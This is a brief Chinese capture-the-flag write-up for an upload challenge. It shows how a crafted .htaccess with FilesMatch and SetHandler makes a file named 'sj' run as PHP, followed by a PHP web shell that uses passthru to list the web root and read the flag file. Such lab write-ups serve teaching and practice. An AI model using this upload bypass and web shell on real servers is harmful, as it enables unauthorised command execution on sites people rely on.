htaccess

点击此处获得更好的阅读体验


本WP来自webking原创投稿

题目考点

  • 文件访问权限

  • .htaccess工作原理

解题思路

1.构造.htaccess文件

FileMatch 参数即为文件名的正则匹配

1
2
3
<FilesMatch "sj">
SetHandler application/x-httpd-php
</FilesMatch>

这句意思就是将sj文件当成php解析

我们的一句话木马为

1
2
3
4
<?php
#passthru("ls /var/www/html/");
passthru("cat /var/www/html/flag_1232123876.php");
?>

先上传.htaccess 上传成功后上传sj文件

sj文件当成php解析即可获取flag